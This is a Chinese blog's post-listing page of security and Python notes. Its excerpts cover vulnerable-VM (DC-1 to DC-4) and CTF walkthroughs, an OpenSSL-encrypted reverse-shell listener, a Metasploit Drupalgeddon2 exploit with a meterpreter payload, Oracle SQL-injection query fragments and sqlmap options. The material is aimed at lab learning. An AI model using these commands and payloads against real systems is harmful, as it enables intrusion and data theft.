- 博客(15)
- 收藏
- 关注
原创 msf cs openssl流量加密
OpenSSL反弹加密shellOpenSSL是一个开放源代码的软件库爆,应用程序可以使这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上在kali上使用OpenSSL生成自签名证书openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes在kali上监听端口openssl s_server -quiet -key key.pem -cert
2022-05-29 22:15:36
824
原创 基于python实现垂直爬虫系统
html_downloaderfrom urllib import requestdef download(url): if url is None: return response = request.urlopen(url) if response.getcode() != 200: return None return response.read()html_outeputerdata_list = []def
2022-03-02 19:55:19
565
原创 python实现学生信息管理系统
import pymysqlconn = pymysql.connect(host="localhost",user="root",password="", database="zuoye",port=3306,autocommit=False)cursor=conn.cursor()def select(): con = "yes" while (con == "yes"): c
2022-03-02 19:40:24
803
原创 流量嗅探sniff函数介绍
sniff(count=0,store=1,offline=None,prn=None,filter=None,L2socket=None,timeout=None,opened_socket=None,stop_filter=None,iface=None)count:抓取报的数量,设置为0时则一直捕获store:保存抓取的数据包或者丢弃,1保存,0丢弃offline:从pcap文件中读取数据包,而不进行嗅探,默认为Noneprn:为每个数据包定义一个回调函数filter:过滤规则,可以在里面定
2022-03-02 16:52:21
847
原创 DC-4靶机渗透详细教程(附靶机链接)
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw提取码:eefe首先查看kali虚拟机的ip地址 ifconfig可以看到我们kali的虚拟机ip为192.168.159.145接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142继续使用namp对靶
2022-03-01 21:16:35
6013
原创 msf介绍及其常用模块
技术功能模块exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法payload:成功exploit之后,真正在目标系统执行的代码或指令auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块encoders:对payload进行加密,躲避av检查的模块nops:提高payload稳定性及维持大小generate常用选项解释:-b 去掉坏字符,例如:-b ‘\x00\xff’-e 设置编码方式,可以使用show encoders命令查看所有编码方式-
2022-03-01 19:00:15
6659
原创 虚拟机之间传输文件
如果是kali中生成的木马文件无法直接迁移到别的虚拟机。可以使用python3中的服务python3 -m http.server 8080在另一台虚拟机中直接输入kali的IP地址和端口号即可直接下载
2022-02-27 21:04:57
4312
原创 2021HECTF mmmmd5d5d5d5
打开页面之后发现只有中间有几行字,直接查看源代码源码中发现了php代码,是弱比较。直接使用数组绕过payload: ?a[]=1&b[]=2之后进入页面发现此页面是让你输入一个字符串经过MD5加密后的第六到第十位等于等号后面的数字,这里我们直接使用脚本爆破注意:经过尝试字符串只能为数字#coding=utf-8from multiprocessing.dummy import Pool as tpimport hashlibknownMd5 = 'e012c'def m
2021-11-15 12:44:08
4768
原创 DC-3靶机渗透详细教程(附靶机链接)
靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg提取码:0na8首先查看本机kali的ip地址:192.168.159.145ifconfig利用nmap扫描靶机IPnmap -sP 192.168.159.1/24查看靶机mac地址打开虚拟机设置,点击网络适配器——高级根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141使用nmap进行完整扫描nmap -A 192.168.159.141
2021-11-12 20:30:14
5807
2
原创 oracle数据库注入联合查询基本语句
oracle对列的类型比较严谨,所以要用null,可以匹配任意类型oracle中的dual表是一个单行单列的虚拟表Dual是Oracle中的一个实际存在的表,任何用户均可读取Oracle版本信息:union select null,(select banner from sys.v_$version where rownum=1),null from dual –当前用户权限: (select *from session_roles)当前数据库版本:(select banner from sys
2021-11-12 16:48:44
764
原创 DC-2靶机渗透详细过程(附靶机链接)
DC-2靶机下载链接: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w提取码:3xt9查看kali主机ip:ifconfig查看靶机的MAC地址:打开虚拟机设置,点击网络适配器,选择nat模式,点击高级。使用nmap扫描目标ip:nmap -sP 192.168.159.0/24对比mac地址发现,目标靶机ip为192.168.159.139使用nmap扫描端口:nmap -A 192.168.159.139 -p 1-65535发现8
2021-06-20 13:52:58
377
原创 sqlmap使用详细参数
基本操作笔记:-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” --resume)–level=(1-5) #要执行的测试水平等级,默认为1–risk=(0-3) #测试执行的风险等级,默认为1
2021-05-20 20:01:49
1175
原创 DC-1靶机渗透详细过程(附靶机连接)
查看本机的ip地址使用nmap进行ip地址扫描,确定靶机的IPnmap -sP 192.168.159.1/24对其进行详细扫描nmap -A 192.168.159.140 -p 1-6553580端口开放,直接使用浏览器访问使用MSF搜索该网页模板存在的漏洞msfconsolesearch drupal使用第四个攻击模块use exploit/unix/webapp/drupal_drupalgeddon2选择攻击载荷set payload php/meterpreter
2021-05-19 20:25:38
861
原创 ctf杂项各类编码汇总
ascii编码base64编码url编码:%61%6c%66%7b%67%79%72%63%74%70%72%67%6f%70%61%69%5f%79%5f%73%73%61%65%7d%79shellcode编码:\x54\x68\x65\x20Quoted-printable(针对非英文,不会考):=E6=95=8F=E6=8D=B7…uuencode(没有特点)unicode(一般不考)莫尔斯电码(经常考short ook: . ? !c8 e9 ac a0 c6 f2 e
2021-05-19 16:31:35
2849
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人